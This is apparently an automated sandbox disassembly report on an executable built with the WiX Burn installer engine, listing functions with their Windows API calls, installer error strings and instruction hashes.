                                                                                                                                                          • String ID: %ls %ls$Bootstrapper application aborted during package process progress.$Bootstrapper application cancelled during package process progress, exit code: 0x%x$Failed to CreateProcess on path: %ls$Failed to append user args.$Failed to wait for executable to complete: %ls$d:\a\wix\wix\src\burn\engine\exeengine.cpp
                                                                                                                                                          • API String ID: 3027418115-2314217598
                                                                                                                                                          • Opcode ID: fe64860e54875985ed3a24efd1527857f82955d91a83bcea25f4ab68ac1d13bc
                                                                                                                                                          • Instruction ID: 420cee98ed6a5f4766c2a3026ac25b5a9b12cce5bfef7accc5aa959c7bdf9b96
                                                                                                                                                          • Opcode Fuzzy Hash: fe64860e54875985ed3a24efd1527857f82955d91a83bcea25f4ab68ac1d13bc
                                                                                                                                                          • Instruction Fuzzy Hash: 7981A231A0020ABBEF119F95CC4ABEF7BB5AB48314F20402AF904B61D1D7B94E518B99
                                                                                                                                                          Function 0043CCE0 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 215registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,-80000001,?,00020019,00000001,8000FFFF,?,00000000,8000FFFF,00000002,?,00000000,00000000), ref: 0043CF45
                                                                                                                                                            • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                            • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseFind$FileFirst
                                                                                                                                                          • String ID: DisplayVersion$Failed to append quote to UninstallString.$Failed to compare versions.$Failed to open registry key: %ls.$Failed to prepend UninstallString with quote.$Failed to read %ls.$Failed to read DisplayVersion.$QuietUninstallString$UninstallString$d:\a\wix\wix\src\burn\engine\exeengine.cpp
                                                                                                                                                          • API String ID: 1228951600-3709064405
                                                                                                                                                          • Opcode ID: 64ee4172dc9e09b38dcab32278421c3d76e40c2c9f19e02d1d9369a85bb93309
                                                                                                                                                          • Instruction ID: a7dc6bbf96fef6da7f8859e624c268c8bfced556c2b309b222921daede608b57
                                                                                                                                                          • Opcode Fuzzy Hash: 64ee4172dc9e09b38dcab32278421c3d76e40c2c9f19e02d1d9369a85bb93309
                                                                                                                                                          • Instruction Fuzzy Hash: 0C61C632A40325BBEB229A648C87BAF7A659F08B10F15516AFD04BA2C1D77C9D4087DD
                                                                                                                                                          Function 0046756E Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 204registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000), ref: 004677C1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls$Failed to delete registry key (ex).$Failed to delete registry key.$Failed to enumerate key 0$Failed to open this key for enumerating subkeys: %ls$Failed to recursively delete subkey: %ls$RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 3535843008-3695644229
                                                                                                                                                          • Opcode ID: db840234d7760af347d7be2031b65faca290769a91719b69bf182046e2ba7092
                                                                                                                                                          • Instruction ID: dff790caec431702a12b4658655e37e59dbf7cb2d6a8bea4c9b09e8ce939d4f3
                                                                                                                                                          • Opcode Fuzzy Hash: db840234d7760af347d7be2031b65faca290769a91719b69bf182046e2ba7092
                                                                                                                                                          • Instruction Fuzzy Hash: 0D513636D48225BBD7315A588C4EFAF7A649B11B2AF11016BFD007A290F27C1D0096EF
                                                                                                                                                          Function 0041470C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
                                                                                                                                                            • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
                                                                                                                                                            • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
                                                                                                                                                            • Part of subcall function 0046B18E: SysAllocString.OLEAUT32(?), ref: 0046B1DF
                                                                                                                                                          • CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000000,00000000,00000000,00000000,0040955C,0040955C,SecondaryPayloadId,?,0040955C,PrimaryPayloadId,?,0040955C), ref: 00414852
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Variant$AllocClearCompareFreeInitOrdinal
                                                                                                                                                          • String ID: Failed to find primary bootstrapper application payload.$Failed to get @PrimaryPayloadId.$Failed to get @SecondaryPayloadId.$Failed to parse user experience payloads.$Failed to select user experience node.$PrimaryPayloadId$SecondaryPayloadId$Too few UX payloads.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 224261554-3120331337
                                                                                                                                                          • Opcode ID: 7e410a6ad40522118b32d4792bdb716af3205ab9d1a31a064729e9db9e0414a6
                                                                                                                                                          • Instruction ID: 264d4c64d7812585cd66e0eddd30a7f60b4670a761c6f30e73e5e5bd9d8587a0
                                                                                                                                                          • Opcode Fuzzy Hash: 7e410a6ad40522118b32d4792bdb716af3205ab9d1a31a064729e9db9e0414a6
                                                                                                                                                          • Instruction Fuzzy Hash: 7F510234A40315BBDB20AA95CC46FEF77A5ABC5710F20466BF618BB3D0D7B859808B5C
                                                                                                                                                          Function 00411838 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 179libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,BootstrapperExtensionData.xml,00000001,?,00000000,?), ref: 00411922
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BootstrapperExtensionCreate), ref: 00411939
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                          • String ID: BootstrapperExtensionCreate$BootstrapperExtensionData.xml$Failed to create BootstrapperExtension '%ls'.$Failed to get BootstrapperExtensionCreate entry-point '%ls'.$Failed to get BootstrapperExtensionDataPath.$Failed to load BootstrapperExtension DLL '%ls': '%ls'.$d:\a\wix\wix\src\burn\engine\burnextension.cpp
                                                                                                                                                          • API String ID: 2574300362-1083119801
                                                                                                                                                          • Opcode ID: 5ec98dc7028d29d781840dbf9ae26ffc87ea6387f146c157c33993294300e86c
                                                                                                                                                          • Instruction ID: 9f1d62b2fee1569f55edb2bee8f4988c739a1f6643786cd55d064ab688632d78
                                                                                                                                                          • Opcode Fuzzy Hash: 5ec98dc7028d29d781840dbf9ae26ffc87ea6387f146c157c33993294300e86c
                                                                                                                                                          • Instruction Fuzzy Hash: 6F51B371E40614ABDB11CF99CC85BDEBFB4AF48750F118066FA08BF2A1D3789940CB99
                                                                                                                                                          Function 004129E8 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 169registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000120,00000000,?,00000000,00000000,00000000,?,00000120,00000001,00000001,00000000,00000000,?,00000120), ref: 00412BC5
                                                                                                                                                          Strings
                                                                                                                                                          • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 00412B9D
                                                                                                                                                          • Failed to open registry key. Key = '%ls', xrefs: 00412A6E
                                                                                                                                                          • Failed to query registry key value., xrefs: 00412B30
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 00412A80, 00412B25, 00412B2A, 00412B42, 00412B89
                                                                                                                                                          • Failed to format value string., xrefs: 00412ACE
                                                                                                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00412B4B
                                                                                                                                                          • Registry key not found. Key = '%ls', xrefs: 00412A99
                                                                                                                                                          • Failed to format key string., xrefs: 00412A18
                                                                                                                                                          • Failed to set variable., xrefs: 00412B77
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 3535843008-1728140318
                                                                                                                                                          • Opcode ID: ef70ec4be66320685dd3127441827e50e32a9f276c9592ed65d9d4ba63be4515
                                                                                                                                                          • Instruction ID: 79c63b38da82e952f13b7196d814404544ab7affd4d458e82adbe44518ec12c8
                                                                                                                                                          • Opcode Fuzzy Hash: ef70ec4be66320685dd3127441827e50e32a9f276c9592ed65d9d4ba63be4515
                                                                                                                                                          • Instruction Fuzzy Hash: 9C511971A40225BBEB225E918D47FEB7B28EF04710F104267BA04B92D1E3F86D6096DD
                                                                                                                                                          Function 0042B6B7 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(?), ref: 0042B6DD
                                                                                                                                                          • LoadBitmapW.USER32(?,?), ref: 0042B704
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B710
                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B751
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0042B76D
                                                                                                                                                          • CreateWindowExW.USER32(00000080,WixBurnSplashScreen,?,90000000,80000000,80000000,?,?,00000000,00000000,?,?), ref: 0042B805
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042B812
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastWindow$BitmapCreateCursorLoadObject
                                                                                                                                                          • String ID: Failed to create splash screen window.$Failed to load splash screen bitmap.$WixBurnSplashScreen$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
                                                                                                                                                          • API String ID: 1087062382-3326576301
                                                                                                                                                          • Opcode ID: eec03763da6081bef8aa801e7b4c0f9fcea9b02fe9bf9b3366dda43853bfd218
                                                                                                                                                          • Instruction ID: cb0a682e315025201bc025ab6f302ed7aae1d21a591630a254ba7dba61f08fb2
                                                                                                                                                          • Opcode Fuzzy Hash: eec03763da6081bef8aa801e7b4c0f9fcea9b02fe9bf9b3366dda43853bfd218
                                                                                                                                                          • Instruction Fuzzy Hash: 19519072A00225ABD700DFA8DC44A6ABBB8FF48710F10816AF908EB251D734EC51CBE4
                                                                                                                                                          Function 00474B0F Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 153COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474C85
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474C94
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00474CA3
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM unknown attribute value., xrefs: 00474C50
                                                                                                                                                          • Failed to get unknown attribute namespace., xrefs: 00474BB4
                                                                                                                                                          • Failed to get unknown attribute name., xrefs: 00474BE2
                                                                                                                                                          • Failed to allocate ATOM unknown attribute name., xrefs: 00474C07
                                                                                                                                                          • Failed to allocate unknown attribute., xrefs: 00474B48
                                                                                                                                                          • Failed to get unknown attribute value., xrefs: 00474C28
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00474B37, 00474B42, 00474B57, 00474BA2
                                                                                                                                                          • Failed to allocate ATOM unknown attribute namespace., xrefs: 00474B93
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString$Heap$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate ATOM unknown attribute name.$Failed to allocate ATOM unknown attribute namespace.$Failed to allocate ATOM unknown attribute value.$Failed to allocate unknown attribute.$Failed to get unknown attribute name.$Failed to get unknown attribute namespace.$Failed to get unknown attribute value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                          • API String ID: 1440466813-611967544
                                                                                                                                                          • Opcode ID: 9dea9711c4dc974d443a71e1f942d4d246a4ca7800fb993fb1ec780d2c3984f2
                                                                                                                                                          • Instruction ID: 7316c843cfe835721413429285ff5cc0b928ca3a4ccbd0d9c79c0171cc7f0f9c
                                                                                                                                                          • Opcode Fuzzy Hash: 9dea9711c4dc974d443a71e1f942d4d246a4ca7800fb993fb1ec780d2c3984f2
                                                                                                                                                          • Instruction Fuzzy Hash: 7741FC71F40225BBDB215A51CC4AFFE7A689B41B14F114066FB09BB2C0E7789D01C79D
                                                                                                                                                          Function 0041A78A Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,feclient.dll,?,?,?), ref: 0041A79E
                                                                                                                                                            • Part of subcall function 00405174: ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                            • Part of subcall function 00405174: GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                          • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix\wix\src\burn\engine\burnpipe.cpp$feclient.dll
                                                                                                                                                          • API String ID: 2959708427-506430072
                                                                                                                                                          • Opcode ID: b0e1af708c232d8d9580720a01dc67898e694b85dadb342497fb30db682f4c49
                                                                                                                                                          • Instruction ID: 39877ab150ca072c22ea0102d205be0689d7e37bccba8a0efe02cce7a16db2f8
                                                                                                                                                          • Opcode Fuzzy Hash: b0e1af708c232d8d9580720a01dc67898e694b85dadb342497fb30db682f4c49
                                                                                                                                                          • Instruction Fuzzy Hash: 4A411D71B8031977DB21B9558C46FEF7A28DB45B10F21016BFB10BE2C1D2B88D4197AA
                                                                                                                                                          Function 00472078 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 140fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00472102
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0047210F
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00472166
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0047219A
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp), ref: 004721EC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                          • String ID: %ls.R$Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to create resume path.$Failed to read resume file: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 3160720760-3233849392
                                                                                                                                                          • Opcode ID: f310cc7da7fabd1159f23cd025eb4f2fb55d4e2cd08050b7d727fbf9b2787d4d
                                                                                                                                                          • Instruction ID: 51438fda0da58f014d712d197603c309d2026f13f7085956d0f6e937570656ed
                                                                                                                                                          • Opcode Fuzzy Hash: f310cc7da7fabd1159f23cd025eb4f2fb55d4e2cd08050b7d727fbf9b2787d4d
                                                                                                                                                          • Instruction Fuzzy Hash: 5941EB72A402257BE7305B54CD49F9B3B68EB05B31F51816AFF08FB2D1D6B89D0097A8
                                                                                                                                                          Function 0046D2F8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(00000000,00000105), ref: 0046D33D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0047097F,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019), ref: 0046D349
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 0046D326, 0046D36D, 0046D373, 0046D384, 0046D3E6, 0046D3EB, 0046D459
                                                                                                                                                          • Failed to alloc Windows directory path., xrefs: 0046D317
                                                                                                                                                          • Failed to get Windows directory path with returned size., xrefs: 0046D3F1
                                                                                                                                                          • Failed to concat subdirectory on Windows directory path., xrefs: 0046D424
                                                                                                                                                          • Failed to get Windows directory path with default size., xrefs: 0046D379
                                                                                                                                                          • Failed to realloc Windows directory path., xrefs: 0046D39F
                                                                                                                                                          • Failed to terminate Windows directory path with backslash., xrefs: 0046D44A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryErrorLastSystemWindows
                                                                                                                                                          • String ID: Failed to alloc Windows directory path.$Failed to concat subdirectory on Windows directory path.$Failed to get Windows directory path with default size.$Failed to get Windows directory path with returned size.$Failed to realloc Windows directory path.$Failed to terminate Windows directory path with backslash.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
                                                                                                                                                          • API String ID: 505562763-4103698096
                                                                                                                                                          • Opcode ID: c51354a6fc7e4cb531487bda56b08e07c15df5e754cb15e180431d70b97503fc
                                                                                                                                                          • Instruction ID: ff7623fce04fab4e9aa9a6d7b57dd934e21ebeadee0100f80abdd692fc46588b
                                                                                                                                                          • Opcode Fuzzy Hash: c51354a6fc7e4cb531487bda56b08e07c15df5e754cb15e180431d70b97503fc
                                                                                                                                                          • Instruction Fuzzy Hash: 9D41F532F80324B3E72156958C4AFAF29689B51B61F124067BD04BF3C1FA7C9D4096EE
                                                                                                                                                          Function 0041D2B9 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 137fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041D2D6
